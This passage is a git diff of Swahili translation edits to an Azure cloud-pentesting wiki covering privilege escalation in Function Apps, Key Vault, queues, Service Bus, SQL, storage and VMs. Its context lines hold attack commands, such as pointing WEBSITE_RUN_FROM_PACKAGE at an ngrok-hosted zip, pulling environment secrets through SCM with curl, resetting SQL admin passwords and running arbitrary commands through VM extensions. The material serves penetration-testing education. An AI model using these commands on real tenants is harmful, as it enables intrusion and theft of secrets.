kupata msimbo wa chanzo katika URL kama: +Kwa funguo kuu pia inawezekana kupata msimbo wa chanzo katika URL kama: ```bash # Get "script_href" from az rest --method GET \ @@ -151,7 +151,7 @@ az rest --method POST --uri "https://management.azure.com/subscriptions/ --key-name --key-type functionKeys --name --key-value q_8ILAoJaSp_wxpyHzGm4RVMPDKnjM_vpEb7z123yRvjAzFuo6wkIQ== ``` @@ -203,9 +203,9 @@ python3 -m http.server # Serve it using ngrok for example ngrok http 8000 ``` -- Badilisha kazi, shika vigezo vya awali na ongeza mwishoni config **`WEBSITE_RUN_FROM_PACKAGE`** ikielekeza kwenye URL yenye **zip** inayoshikilia msimbo. +- Badilisha kazi, shika vigezo vya awali na ongeza mwishoni **`WEBSITE_RUN_FROM_PACKAGE`** ikielekeza kwenye URL yenye **zip** inayoshikilia msimbo. -Mfano ufuatao ni wa **mipangilio yangu mwenyewe unahitaji kubadilisha thamani kwa zako**, kumbuka mwishoni thamani `"WEBSITE_RUN_FROM_PACKAGE": "https://4c7d-81-33-68-77.ngrok-free.app/function_app.zip"` , hapa ndipo nilipokuwa nikihifadhi programu. +Mfano ufuatao ni wa **mipangilio yangu mwenyewe unahitaji kubadilisha thamani kwa zako**, angalia mwishoni thamani `"WEBSITE_RUN_FROM_PACKAGE": "https://4c7d-81-33-68-77.ngrok-free.app/function_app.zip"` , hapa ndipo nilipokuwa nikihifadhi programu. ```bash # Modify the function az rest --method PUT \ @@ -234,7 +234,7 @@ az functionapp deployment list-publishing-profiles \ --resource-group \ --output json ``` -Chaguo lingine lingekuwa kuweka akreditivu zako mwenyewe na kuzitumia kwa kutumia: +Njia nyingine ingekuwa kuweka akreditivu zako mwenyewe na kuzitumia kwa: ```bash az functionapp deployment user set \ --user-name DeployUser123456 g \ @@ -264,7 +264,7 @@ az rest --method PUT \ ``` - **Method SCM** -Kisha, unaweza kufikia na hizi **basic auth credentials kwa URL ya SCM** ya programu yako ya kazi na kupata thamani za mabadiliko ya env: +Kisha, unaweza kufikia na hizi **basic auth credentials to the SCM URL** ya programu yako ya kazi na kupata thamani za mabadiliko ya env: ```bash # Get settings values curl -u ':' \ @@ -301,7 +301,7 @@ _Note that the **FTP username** is usually in the format \\\$\/res ``` ### Microsoft.Web/sites/config/write, Microsoft.Web/sites/config/list/action, (Microsoft.Web/sites/read, Microsoft.Web/sites/config/list/action, Microsoft.Web/sites/config/read) -Kwa ruhusa hizi inawezekana **kubadilisha kontena linalosimamiwa na programu ya kazi** iliyowekwa ili kuendesha kontena. Hii itamruhusu mshambuliaji kupakia programu ya kontena ya kazi ya azure yenye uharibifu kwenye docker hub (kwa mfano) na kufanya kazi hiyo iite. +Kwa ruhusa hizi inawezekana **kubadilisha kontena linalotumiwa na programu ya kazi** iliyowekwa ili kuendesha kontena. Hii itamruhusu mshambuliaji kupakia programu ya kontena ya kazi ya azure yenye uharibifu kwenye docker hub (kwa mfano) na kufanya kazi hiyo iite. ```bash az functionapp config container set --name \ --resource-group \ @@ -352,7 +352,7 @@ az functionapp config container set --name \ ``` ### Microsoft.Web/sites/write, Microsoft.ManagedIdentity/userAssignedIdentities/assign/action, Microsoft.App/managedEnvironments/join/action, (Microsoft.Web/sites/read, Microsoft.Web/sites/operationresults/read) -Kwa ruhusa hizi inawezekana **kuunganisha utambulisho wa mtumiaji aliyejisimamia mpya kwa kazi**. Ikiwa kazi hiyo ilikumbwa na hatari hii itaruhusu kupandisha mamlaka kwa utambulisho wowote wa mtumiaji aliyejisimamia. +Kwa ruhusa hizi inawezekana **kuunganisha utambulisho wa mtumiaji uliosimamiwa mpya kwa kazi**. Ikiwa kazi hiyo ilikumbwa na hatari hii itaruhusu kupandisha mamlaka kwa utambulisho wowote wa mtumiaji uliosimamiwa. ```bash az functionapp identity assign \ --name \ @@ -361,7 +361,7 @@ az functionapp identity assign \ ``` ### Remote Debugging -Inawezekana pia kuungana ili kudebug kazi inayotembea ya Azure kama [**ilivyoelezwa katika nyaraka**](https://learn.microsoft.com/en-us/azure/azure-functions/functions-develop-vs). Hata hivyo, kwa kawaida Azure itazima chaguo hili baada ya siku 2 ikiwa mendelevu atasahau ili kuepuka kuacha usanidi dhaifu. +Inawezekana pia kuungana ili kudebug kazi inayotembea ya Azure kama [**ilivyoelezwa katika nyaraka**](https://learn.microsoft.com/en-us/azure/azure-functions/functions-develop-vs). Hata hivyo, kwa default Azure itazima chaguo hili baada ya siku 2 ikiwa mendelevu atasahau ili kuepuka kuacha usanidi dhaifu. Inawezekana kuangalia ikiwa Kazi ina uwezo wa kudebug kwa: ```bash @@ -373,8 +373,8 @@ az functionapp config set --remote-debugging-enabled=True --name --re ``` ### Badilisha Github repo -Nilijaribu kubadilisha Github repo kutoka ambapo kutekelezwa kunafanyika kwa kutekeleza amri zifuatazo lakini hata kama ilibadilika, **msimbo mpya haukupakuliwa** (labda kwa sababu inategemea Github Action kuboresha msimbo).\ -Zaidi ya hayo, **kitambulisho cha usimamizi wa shirikisho hakikubadilishwa** kuruhusu hazina mpya, hivyo inaonekana kwamba hii si ya manufaa sana. +Nilijaribu kubadilisha Github repo kutoka ambapo kutekelezwa kunafanyika kwa kutekeleza amri zifuatazo lakini hata kama ilibadilika, **msimbo mpya haukupakuliwa** (labda kwa sababu inatarajia Github Action kuboresha msimbo).\ +Zaidi ya hayo, **kitambulisho cha usimamizi wa shirikisho hakikubadilishwa** kuruhusu hazina mpya, hivyo inaonekana kama hii si ya manufaa sana. ```bash # Remove current az functionapp deployment source delete \ diff --git a/src/pentesting-cloud/azure-security/az-privilege-escalation/az-key-vault-privesc.md b/src/pentesting-cloud/azure-security/az-privilege-escalation/az-key-vault-privesc.md index aad58c8e8..2814fecaa 100644 --- a/src/pentesting-cloud/azure-security/az-privilege-escalation/az-key-vault-privesc.md +++ b/src/pentesting-cloud/azure-security/az-privilege-escalation/az-key-vault-privesc.md @@ -12,7 +12,7 @@ Kwa maelezo zaidi kuhusu huduma hii angalia: ### Microsoft.KeyVault/vaults/write -Mshambuliaji mwenye ruhusa hii ataweza kubadilisha sera ya vault ya funguo (vault ya funguo inapaswa kutumia sera za ufikiaji badala ya RBAC). +Mshambuliaji mwenye ruhusa hii ataweza kubadilisha sera ya vault ya funguo (vault ya funguo lazima itumie sera za ufikiaji badala ya RBAC). ```bash # If access policies in the output, then you can abuse it az keyvault show --name diff --git a/src/pentesting-cloud/azure-security/az-privilege-escalation/az-queue-privesc.md b/src/pentesting-cloud/azure-security/az-privilege-escalation/az-queue-privesc.md index 9102e40ec..b28c9cda6 100644 --- a/src/pentesting-cloud/azure-security/az-privilege-escalation/az-queue-privesc.md +++ b/src/pentesting-cloud/azure-security/az-privilege-escalation/az-queue-privesc.md @@ -12,7 +12,7 @@ Kwa maelezo zaidi angalia: ### DataActions: `Microsoft.Storage/storageAccounts/queueServices/queues/messages/read` -Mshambuliaji mwenye ruhusa hii anaweza kuangalia ujumbe kutoka kwa Azure Storage Queue. Hii inamruhusu mshambuliaji kuona maudhui ya ujumbe bila kuashiria kuwa umeshughulikiwa au kubadilisha hali yao. Hii inaweza kusababisha ufikiaji usioidhinishwa wa taarifa nyeti, ikiruhusu uhamasishaji wa data au kukusanya taarifa kwa mashambulizi zaidi. +Mshambuliaji mwenye ruhusa hii anaweza kuangalia ujumbe kutoka kwa Azure Storage Queue. Hii inamruhusu mshambuliaji kuona maudhui ya ujumbe bila kuashiria kuwa yamechakatwa au kubadilisha hali yao. Hii inaweza kusababisha ufikiaji usioidhinishwa wa taarifa nyeti, ikiruhusu uhamasishaji wa data au kukusanya taarifa kwa mashambulizi zaidi. ```bash az storage message peek --queue-name --account-name ``` @@ -20,7 +20,7 @@ az storage message peek --queue-name --account-name --account-name ``` @@ -32,7 +32,7 @@ az storage message put --queue-name --content "Injected malicious m ``` ### DataActions: `Microsoft.Storage/storageAccounts/queueServices/queues/messages/write` -Ruhusa hii inaruhusu mshambuliaji kuongeza ujumbe mpya au kuboresha wale waliopo katika Azure Storage Queue. Kwa kutumia hii, wanaweza kuingiza maudhui mabaya au kubadilisha ujumbe waliopo, ambayo yanaweza kuongoza vibaya programu au kusababisha tabia zisizohitajika katika mifumo inayotegemea foleni. +Ruhusa hii inamruhusu mshambuliaji kuongeza ujumbe mpya au kuboresha wale waliopo katika Azure Storage Queue. Kwa kutumia hii, wanaweza kuingiza maudhui mabaya au kubadilisha ujumbe waliopo, ambayo yanaweza kupelekea upotoshaji wa programu au kusababisha tabia zisizohitajika katika mifumo inayotegemea foleni. ```bash az storage message put --queue-name --content "Injected malicious message" --account-name @@ -46,7 +46,7 @@ az storage message update --queue-name \ ``` ### Action: `Microsoft.Storage/storageAccounts/queueServices/queues/write` -Ruhusa hii inaruhusu mshambuliaji kuunda au kubadilisha foleni na mali zao ndani ya akaunti ya hifadhi. Inaweza kutumika kuunda foleni zisizoidhinishwa, kubadilisha metadata, au kubadilisha orodha za udhibiti wa ufikiaji (ACLs) ili kutoa au kupunguza ufikiaji. Uwezo huu unaweza kuharibu michakato, kuingiza data mbaya, kuhamasisha taarifa nyeti, au kubadilisha mipangilio ya foleni ili kuwezesha mashambulizi zaidi. +Ruhusa hii inaruhusu mshambuliaji kuunda au kubadilisha foleni na mali zao ndani ya akaunti ya hifadhi. Inaweza kutumika kuunda foleni zisizoidhinishwa, kubadilisha metadata, au kubadilisha orodha za udhibiti wa ufikiaji (ACLs) ili kutoa au kupunguza ufikiaji. Uwezo huu unaweza kuharibu mchakato wa kazi, kuingiza data mbaya, kuhamasisha taarifa nyeti, au kubadilisha mipangilio ya foleni ili kuwezesha mashambulizi zaidi. ```bash az storage queue create --name --account-name diff --git a/src/pentesting-cloud/azure-security/az-privilege-escalation/az-servicebus-privesc.md b/src/pentesting-cloud/azure-security/az-privilege-escalation/az-servicebus-privesc.md index 3b549e181..115eb1e27 100644 --- a/src/pentesting-cloud/azure-security/az-privilege-escalation/az-servicebus-privesc.md +++ b/src/pentesting-cloud/azure-security/az-privilege-escalation/az-servicebus-privesc.md @@ -12,7 +12,7 @@ Kwa maelezo zaidi angalia: ### Tuma Ujumbe. Kitendo: `Microsoft.ServiceBus/namespaces/authorizationRules/listkeys/action` AU `Microsoft.ServiceBus/namespaces/authorizationRules/regenerateKeys/action` -Unaweza kupata `PrimaryConnectionString`, ambayo inafanya kazi kama kitambulisho kwa ajili ya Service Bus namespace. Kwa kutumia uhusiano huu, unaweza kuthibitisha kikamilifu kama Service Bus namespace, na kukuwezesha kutuma ujumbe kwa foleni au mada yoyote na kwa uwezekano kuingiliana na mfumo kwa njia ambazo zinaweza kuharibu shughuli, kujifanya kuwa watumiaji halali, au kuingiza data mbaya katika mchakato wa ujumbe. +Unaweza kupata `PrimaryConnectionString`, ambayo inafanya kazi kama akidi kwa namespace ya Service Bus. Pamoja na uhusiano huu, unaweza kuthibitisha kikamilifu kama namespace ya Service Bus, na kukuwezesha kutuma ujumbe kwa foleni au mada yoyote na kwa uwezekano kuingiliana na mfumo kwa njia ambazo zinaweza kuharibu shughuli, kujifanya kuwa watumiaji halali, au kuingiza data mbaya katika mchakato wa ujumbe. ```python #You need to install the following libraries #pip install azure-servicebus @@ -83,7 +83,7 @@ print("----------------------------") ``` ### Pokea Ujumbe. Kitendo: `Microsoft.ServiceBus/namespaces/authorizationRules/listkeys/action` AU `Microsoft.ServiceBus/namespaces/authorizationRules/regenerateKeys/action` -Unaweza kupata PrimaryConnectionString, ambayo inatumika kama akidi kwa ajili ya Service Bus namespace. Kwa kutumia uhusiano huu, unaweza kupokea ujumbe kutoka kwa foleni yoyote au usajili ndani ya namespace, ikiruhusu ufikiaji wa data ambayo inaweza kuwa nyeti au muhimu, ikihamasisha uhamasishaji wa data, au kuingilia kati mchakato wa ujumbe na michakato ya programu. +Unaweza kupata PrimaryConnectionString, ambayo inatumika kama akidi kwa ajili ya Service Bus namespace. Kwa kutumia uhusiano huu, unaweza kupokea ujumbe kutoka kwa foleni yoyote au usajili ndani ya namespace, ikiruhusu ufikiaji wa data ambayo inaweza kuwa nyeti au muhimu, ikiruhusu uhamasishaji wa data, au kuingilia kati katika usindikaji wa ujumbe na michakato ya programu. ```python #You need to install the following libraries #pip install azure-servicebus @@ -129,7 +129,7 @@ print("----------------------------") ``` ### `Microsoft.ServiceBus/namespaces/authorizationRules/write` & `Microsoft.ServiceBus/namespaces/authorizationRules/write` -Ikiwa una ruhusa hizi, unaweza kuongeza mamlaka kwa kusoma au kuunda funguo za ufikiaji wa pamoja. Funguo hizi zinakupa udhibiti kamili juu ya namespace ya Service Bus, ikiwa ni pamoja na kusimamia foleni, mada, na kutuma/kupokea ujumbe, ambayo inaweza kupita udhibiti wa ufikiaji wa msingi wa jukumu (RBAC). +Ikiwa una ruhusa hizi, unaweza kuongeza mamlaka kwa kusoma au kuunda funguo za ufikiaji wa pamoja. Funguo hizi zinakupa udhibiti kamili juu ya namespace ya Service Bus, ikiwa ni pamoja na kusimamia foleni, mada, na kutuma/ kupokea ujumbe, ambayo inaweza kupita udhibiti wa ufikiaji kulingana na majukumu (RBAC). ```bash az servicebus namespace authorization-rule update \ --resource-group \ diff --git a/src/pentesting-cloud/azure-security/az-privilege-escalation/az-sql-privesc.md b/src/pentesting-cloud/azure-security/az-privilege-escalation/az-sql-privesc.md index 937202de2..9815044e2 100644 --- a/src/pentesting-cloud/azure-security/az-privilege-escalation/az-sql-privesc.md +++ b/src/pentesting-cloud/azure-security/az-privilege-escalation/az-sql-privesc.md @@ -12,7 +12,7 @@ Kwa maelezo zaidi kuhusu SQL Database angalia: ### "Microsoft.Sql/servers/read" && "Microsoft.Sql/servers/write" -Kwa ruhusa hizi, mtumiaji anaweza kufanya kupandisha hadhi kwa kuboresha au kuunda Azure SQL servers na kubadilisha mipangilio muhimu, ikiwa ni pamoja na akcredentials za usimamizi. Ruhusa hii inamruhusu mtumiaji kuboresha mali za server, ikiwa ni pamoja na nenosiri la msimamizi wa SQL server, na kuwezesha ufikiaji usioidhinishwa au udhibiti wa server. Wanaweza pia kuunda servers mpya, ambayo inaweza kuanzisha miundombinu ya kivuli kwa madhumuni mabaya. Hii inakuwa muhimu hasa katika mazingira ambapo "Microsoft Entra Authentication Only" imezimwa, kwani wanaweza kutumia uthibitishaji wa SQL kupata ufikiaji usio na kikomo. +Kwa ruhusa hizi, mtumiaji anaweza kufanya kupandisha hadhi kwa kuboresha au kuunda Azure SQL servers na kubadilisha mipangilio muhimu, ikiwa ni pamoja na akcredentials za usimamizi. Ruhusa hii inamruhusu mtumiaji kuboresha mali za server, ikiwa ni pamoja na nenosiri la msimamizi wa SQL server, ikiruhusu ufikiaji usioidhinishwa au udhibiti juu ya server. Wanaweza pia kuunda servers mpya, huenda wakileta miundombinu ya kivuli kwa madhumuni mabaya. Hii inakuwa muhimu hasa katika mazingira ambapo "Microsoft Entra Authentication Only" imezimwa, kwani wanaweza kutumia uthibitishaji wa SQL kupata ufikiaji usio na kikomo. ```bash # Change the server password az sql server update \ @@ -37,7 +37,7 @@ az sql server update \ ``` ### "Microsoft.Sql/servers/firewallRules/write" -Mshambuliaji anaweza kubadilisha sheria za firewall kwenye Azure SQL servers ili kuruhusu ufikiaji usioidhinishwa. Hii inaweza kutumika kufungua server kwa anwani maalum za IP au anuwai nzima za IP, ikiwa ni pamoja na IP za umma, ikiruhusu ufikiaji kwa wahalifu. Shughuli hii ya baada ya unyakuzi inaweza kutumika kupita udhibiti wa usalama wa mtandao uliopo, kuanzisha kudumu, au kuwezesha harakati za upande ndani ya mazingira kwa kufichua rasilimali nyeti. +Mshambuliaji anaweza kubadilisha sheria za firewall kwenye Azure SQL servers ili kuruhusu ufikiaji usioidhinishwa. Hii inaweza kutumika kufungua seva kwa anwani maalum za IP au anuwai nzima za IP, ikiwa ni pamoja na IP za umma, na kuruhusu ufikiaji kwa wahusika wabaya. Shughuli hii ya baada ya unyakuzi inaweza kutumika kupita udhibiti wa usalama wa mtandao uliopo, kuanzisha kudumu, au kuwezesha harakati za upande ndani ya mazingira kwa kufichua rasilimali nyeti. ```bash # Create Firewall Rule az sql server firewall-rule create \ @@ -69,7 +69,7 @@ az sql server firewall-rule create \ --start-ip-address \ --end-ip-address ``` -Zaidi ya hayo, ruhusa ya `Microsoft.Sql/servers/ipv6FirewallRules/delete` inakuwezesha kufuta Kanuni ya Firewall. +Zaidi ya hayo, ruhusa ya `Microsoft.Sql/servers/ipv6FirewallRules/delete` inakuwezesha kufuta Sheria ya Firewall. KUMBUKA: Ni muhimu kuwa na ufikiaji wa umma ulioanzishwa ### "Microsoft.Sql/servers/administrators/write" && "Microsoft.Sql/servers/administrators/read" diff --git a/src/pentesting-cloud/azure-security/az-privilege-escalation/az-storage-privesc.md b/src/pentesting-cloud/azure-security/az-privilege-escalation/az-storage-privesc.md index c92c9a70b..acb513821 100644 --- a/src/pentesting-cloud/azure-security/az-privilege-escalation/az-storage-privesc.md +++ b/src/pentesting-cloud/azure-security/az-privilege-escalation/az-storage-privesc.md @@ -12,7 +12,7 @@ Kwa maelezo zaidi kuhusu uhifadhi angalia: ### Microsoft.Storage/storageAccounts/listkeys/action -Mtu mwenye ruhusa hii ataweza kuorodhesha (na thamani za siri) za **funguo za ufikiaji** za akaunti za uhifadhi. Hii inaruhusu mtu huyo kupandisha hadhi yake juu ya akaunti za uhifadhi. +Mtu mwenye ruhusa hii ataweza kuorodhesha (na thamani za siri) za **funguo za ufikiaji** za akaunti za uhifadhi. Hii inaruhusu mtu huyo kuongeza mamlaka yake juu ya akaunti za uhifadhi. ```bash az storage account keys list --account-name ``` @@ -38,10 +38,10 @@ az storage account update --name --add networkRuleSet.ipRules value=< ### Microsoft.Storage/storageAccounts/blobServices/containers/immutabilityPolicies/write | Microsoft.Storage/storageAccounts/blobServices/containers/immutabilityPolicies/delete -Ruhusa ya kwanza inaruhusu **kubadilisha sera za kutokuweza kubadilishwa** katika kontena na ya pili inaruhusu kuzifuta. +Ruhusa ya kwanza inaruhusu **kubadilisha sera za kutoweza kubadilishwa** katika kontena na ya pili inaruhusu kuzifuta. > [!NOTE] -> Kumbuka kwamba ikiwa sera ya kutokuweza kubadilishwa iko katika hali ya kufungwa, huwezi kufanya mojawapo ya hizo mbili. +> Kumbuka kwamba ikiwa sera ya kutoweza kubadilishwa iko katika hali ya kufungwa, huwezi kufanya mojawapo ya hizo mbili. ```bash az storage container immutability-policy delete \ --account-name \ @@ -82,14 +82,14 @@ az storage account local-user create \ ``` ### Microsoft.Storage/storageAccounts/localusers/regeneratePassword/action -Kwa ruhusa hii, mshambuliaji anaweza kuunda upya nenosiri la mtumiaji wa ndani katika akaunti ya Azure Storage. Hii inampa mshambuliaji uwezo wa kupata akreditif mpya za uthibitishaji (kama vile nenosiri la SSH au SFTP) kwa mtumiaji. Kwa kutumia akreditif hizi, mshambuliaji anaweza kupata ufikiaji usioidhinishwa kwenye akaunti ya hifadhi, kufanya uhamishaji wa faili, au kubadilisha data ndani ya kontena za hifadhi. Hii inaweza kusababisha uvujaji wa data, uharibifu, au mabadiliko mabaya ya maudhui ya akaunti ya hifadhi. +Kwa ruhusa hii, mshambuliaji anaweza kuunda upya nenosiri la mtumiaji wa ndani katika akaunti ya Azure Storage. Hii inampa mshambuliaji uwezo wa kupata hati mpya za uthibitishaji (kama vile nenosiri la SSH au SFTP) kwa mtumiaji. Kwa kutumia hati hizi, mshambuliaji anaweza kupata ufikiaji usioidhinishwa kwenye akaunti ya hifadhi, kufanya uhamishaji wa faili, au kubadilisha data ndani ya kontena za hifadhi. Hii inaweza kusababisha uvujaji wa data, uharibifu, au mabadiliko mabaya ya maudhui ya akaunti ya hifadhi. ```bash az storage account local-user regenerate-password \ --account-name \ --resource-group \ --name ``` -Ili kufikia Azure Blob Storage kupitia SFTP kwa kutumia mtumiaji wa ndani kupitia SFTP unaweza (unaweza pia kutumia ssh key kuungana): +Ili kufikia Azure Blob Storage kupitia SFTP kwa kutumia mtumiaji wa ndani kupitia SFTP unaweza (unaweza pia kutumia funguo za ssh kuungana): ```bash sftp @.blob.core.windows.net #regenerated-password @@ -112,7 +112,7 @@ az storage blob undelete \ ``` ### Microsoft.Storage/storageAccounts/fileServices/shares/restore/action && Microsoft.Storage/storageAccounts/read -Kwa ruhusa hizi, mshambuliaji anaweza kurejesha sehemu ya faili ya Azure iliyofutwa kwa kubainisha kitambulisho chake cha toleo lililofutwa. Kuinua ruhusa hii kunaweza kumwezesha mshambuliaji kurejesha data nyeti ambayo ilikusudiwa kufutwa kabisa, ambayo inaweza kusababisha ufikiaji usioidhinishwa. +Kwa ruhusa hizi, mshambuliaji anaweza kurejesha sehemu ya faili ya Azure iliyofutwa kwa kubainisha kitambulisho cha toleo lake lililofutwa. Kuinua kwa ruhusa hii kunaweza kumwezesha mshambuliaji kurejesha data nyeti ambayo ilikusudiwa kufutwa kabisa, ambayo inaweza kusababisha ufikiaji usioidhinishwa. ```bash az storage share-rm restore \ --storage-account \ @@ -121,12 +121,12 @@ az storage share-rm restore \ ``` ## Mamlaka mengine ya kuvutia (TODO) -- Microsoft.Storage/storageAccounts/blobServices/containers/blobs/manageOwnership/action: Hubadilisha umiliki wa blob -- Microsoft.Storage/storageAccounts/blobServices/containers/blobs/modifyPermissions/action: Hubadilisha mamlaka ya blob +- Microsoft.Storage/storageAccounts/blobServices/containers/blobs/manageOwnership/action: Inabadilisha umiliki wa blob +- Microsoft.Storage/storageAccounts/blobServices/containers/blobs/modifyPermissions/action: Inabadilisha mamlaka ya blob - Microsoft.Storage/storageAccounts/blobServices/containers/blobs/runAsSuperUser/action: Inarudisha matokeo ya amri ya blob - Microsoft.Storage/storageAccounts/blobServices/containers/blobs/immutableStorage/runAsSuperUser/action -## Marejeo +## Marejeleo - [https://learn.microsoft.com/en-us/azure/role-based-access-control/permissions/storage#microsoftstorage](https://learn.microsoft.com/en-us/azure/role-based-access-control/permissions/storage#microsoftstorage) - [https://learn.microsoft.com/en-us/azure/storage/blobs/secure-file-transfer-protocol-support](https://learn.microsoft.com/en-us/azure/storage/blobs/secure-file-transfer-protocol-support) diff --git a/src/pentesting-cloud/azure-security/az-privilege-escalation/az-virtual-machines-and-network-privesc.md b/src/pentesting-cloud/azure-security/az-privilege-escalation/az-virtual-machines-and-network-privesc.md index 3f1390426..f27887f0e 100644 --- a/src/pentesting-cloud/azure-security/az-privilege-escalation/az-virtual-machines-and-network-privesc.md +++ b/src/pentesting-cloud/azure-security/az-privilege-escalation/az-virtual-machines-and-network-privesc.md @@ -13,7 +13,7 @@ Kwa maelezo zaidi kuhusu Azure Virtual Machines na Network angalia: ### **`Microsoft.Compute/virtualMachines/extensions/write`** Ruhusa hii inaruhusu kutekeleza nyongeza katika mashine za virtual ambazo zinaruhusu **kutekeleza msimbo wowote juu yao**.\ -Mfano wa kutumia nyongeza za kawaida kutekeleza amri za kawaida katika VM: +Mfano wa kutumia nyongeza za kawaida kutekeleza amri zisizo za kawaida katika VM: {{#tabs }} {{#tab name="Linux" }} @@ -87,7 +87,7 @@ Set-AzVMAccessExtension -ResourceGroupName "" -VMName "" -Na {{#endtab }} {{#endtabs }} -Pia inawezekana kutumia nyongeza zinazojulikana vizuri kutekeleza msimbo au kufanya vitendo vya kibali ndani ya VMs: +Pia inawezekana kutumia nyongeza zinazojulikana vizuri ili kutekeleza msimbo au kufanya vitendo vya kibali ndani ya VMs:
@@ -163,9 +163,9 @@ Hii ni nyongeza ya VM ambayo itaruhusu kutekeleza runbooks katika VMs kutoka kwa ### `Microsoft.Compute/disks/write, Microsoft.Network/networkInterfaces/join/action, Microsoft.Compute/virtualMachines/write, (Microsoft.Compute/galleries/applications/write, Microsoft.Compute/galleries/applications/versions/write)` -Hizi ni ruhusa zinazohitajika ili **kuunda programu mpya ya galleri na kuitekeleza ndani ya VM**. Programu za galleri zinaweza kutekeleza chochote hivyo mshambuliaji anaweza kutumia hii kuathiri mifano ya VM zinazotekeleza amri zisizo na mipaka. +Hizi ndizo ruhusa zinazohitajika ili **kuunda programu mpya ya galleri na kuitekeleza ndani ya VM**. Programu za galleri zinaweza kutekeleza chochote hivyo mshambuliaji anaweza kutumia hii kuathiri mifano ya VM zinazotekeleza amri zisizo na mipaka. -Ruhusa za mwisho 2 zinaweza kuepukwa kwa kushiriki programu hiyo na mpangaji. +Ruhusa 2 za mwisho zinaweza kuepukwa kwa kushiriki programu hiyo na mpangaji. Mfano wa unyakuzi wa kutekeleza amri zisizo na mipaka: @@ -310,7 +310,7 @@ Ingia kupitia **SSH** na **`az ssh vm --name --resource-group [!WARNING] > Kumbuka kwamba **hakuna** ya kutengwa hizo **zinazuia** udhaifu mwingine wa kawaida wa **wavuti** (kama vile kupakia faili, au sindano). Na ikiwa **utambulisho wa usimamizi** unatumika, inaweza kuwa na uwezo wa **kuinua mamlaka kwao**. @@ -22,16 +22,16 @@ Kwa kweli baadhi ya **vipengele vinavyohusiana na usalama** ambavyo huduma za pr ## Basic Authentication -Unapounda programu ya wavuti (na kazi ya Azure kwa kawaida) inawezekana kuashiria ikiwa unataka Uthibitishaji wa Msingi uwekwe. Hii kimsingi **inawezesha SCM na FTP** kwa programu ili iwezekane kupeleka programu kwa kutumia teknolojia hizo.\ +Unapounda programu ya wavuti (na kazi ya Azure kwa kawaida) inawezekana kuashiria ikiwa unataka Uthibitishaji wa Msingi uwekwe. Hii kimsingi **inawezesha SCM na FTP** kwa ajili ya programu ili iwezekane kupeleka programu kwa kutumia teknolojia hizo.\ Zaidi ya hayo ili kuungana nazo, Azure inatoa **API inayoruhusu kupata jina la mtumiaji, nenosiri na URL** ya kuungana na seva za SCM na FTP. - Uthibitishaji: az webapp auth show --name lol --resource-group lol_group SSH -Always On +Daima On -Debugging +Kukarabati ### Enumeration diff --git a/src/pentesting-cloud/azure-security/az-services/az-application-proxy.md b/src/pentesting-cloud/azure-security/az-services/az-application-proxy.md index fef15272b..68a42ed4f 100644 --- a/src/pentesting-cloud/azure-security/az-services/az-application-proxy.md +++ b/src/pentesting-cloud/azure-security/az-services/az-application-proxy.md @@ -15,7 +15,7 @@ Inafanya kazi kama ifuatavyo: 1. Baada ya mtumiaji kufikia programu kupitia kiunganishi, mtumiaji anapelekwa kwenye **ukurasa wa kuingia wa Azure AD**. 2. Baada ya **kuingia kwa mafanikio**, Azure AD inatuma **token** kwa kifaa cha mteja wa mtumiaji. 3. Mteja anatumia token kwa **huduma ya Application Proxy**, ambayo inapata jina la msingi la mtumiaji (UPN) na jina la msingi la usalama (SPN) kutoka kwa token. **Application Proxy kisha inatuma ombi kwa kiunganishi cha Application Proxy**. -4. Ikiwa umeweka muunganisho wa mara moja, kiunganishi kinafanya **uthibitishaji wa ziada** wowote unaohitajika kwa niaba ya mtumiaji. +4. Ikiwa umeweka kuingia mara moja, kiunganishi kinafanya **uthibitishaji wa ziada** wowote unaohitajika kwa niaba ya mtumiaji. 5. Kiunganishi kinatuma ombi kwa **programu ya ndani**. 6. **Jibu** linatumwa kupitia kiunganishi na huduma ya Application Proxy **kwa mtumiaji**. diff --git a/src/pentesting-cloud/azure-security/az-services/az-arm-templates.md b/src/pentesting-cloud/azure-security/az-services/az-arm-templates.md index 240038ca7..349203d0a 100644 --- a/src/pentesting-cloud/azure-security/az-services/az-arm-templates.md +++ b/src/pentesting-cloud/azure-security/az-services/az-arm-templates.md @@ -4,11 +4,11 @@ ## Basic Information -[From the docs:](https://learn.microsoft.com/en-us/azure/azure-resource-manager/templates/overview) Ili kutekeleza **miundombinu kama msimbo kwa suluhisho zako za Azure**, tumia Azure Resource Manager templates (ARM templates). Template ni faili ya JavaScript Object Notation (**JSON**) ambayo **inafafanua** **miundombinu** na usanidi wa mradi wako. Template inatumia sintaksia ya kutangaza, ambayo inakuwezesha kusema kile unachokusudia kupeleka bila kuandika mfululizo wa amri za programu kuunda hiyo. Katika template, unataja rasilimali za kupeleka na mali za rasilimali hizo. +[From the docs:](https://learn.microsoft.com/en-us/azure/azure-resource-manager/templates/overview) Ili kutekeleza **miundombinu kama msimbo kwa suluhu zako za Azure**, tumia Azure Resource Manager templates (ARM templates). Template ni faili ya JavaScript Object Notation (**JSON**) ambayo **inafafanua** **miundombinu** na usanidi wa mradi wako. Template inatumia sintaksia ya kutangaza, ambayo inakuwezesha kusema kile unachokusudia kupeleka bila kuandika mfululizo wa amri za programu ili kuunda. Katika template, unataja rasilimali za kupeleka na mali za rasilimali hizo. ### History -Ikiwa unaweza kuipata, unaweza kuwa na **habari kuhusu rasilimali** ambazo hazipo lakini zinaweza kupelekwa katika siku zijazo. Zaidi ya hayo, ikiwa **parameta** inayoshikilia **habari nyeti** iligongwa kama "**String**" **badala** ya "**SecureString**", itakuwa katika **maandishi wazi**. +Ikiwa unaweza kuifikia, unaweza kupata **habari kuhusu rasilimali** ambazo hazipo lakini zinaweza kupelekwa katika siku zijazo. Zaidi ya hayo, ikiwa **parameta** inayoshikilia **habari nyeti** iligongwa kama "**String**" **badala ya** "**SecureString**", itakuwa ipo katika **maandishi wazi**. ## Search Sensitive Info diff --git a/src/pentesting-cloud/azure-security/az-services/az-automation-account/README.md b/src/pentesting-cloud/azure-security/az-services/az-automation-account/README.md index e13f81276..729e0b066 100644 --- a/src/pentesting-cloud/azure-security/az-services/az-automation-account/README.md +++ b/src/pentesting-cloud/azure-security/az-services/az-automation-account/README.md @@ -4,13 +4,13 @@ ## Basic Information -[From the docs:](https://learn.microsoft.com/en-us/azure/automation/overview) Azure Automation inatoa huduma ya automation ya msingi ya wingu, masasisho ya mfumo wa uendeshaji, na huduma ya usimamizi wa usanidi inayounga mkono usimamizi thabiti katika mazingira yako ya Azure na yasiyo ya Azure. Inajumuisha automation ya mchakato, usimamizi wa usanidi, usimamizi wa masasisho, uwezo wa pamoja, na vipengele tofauti. +[From the 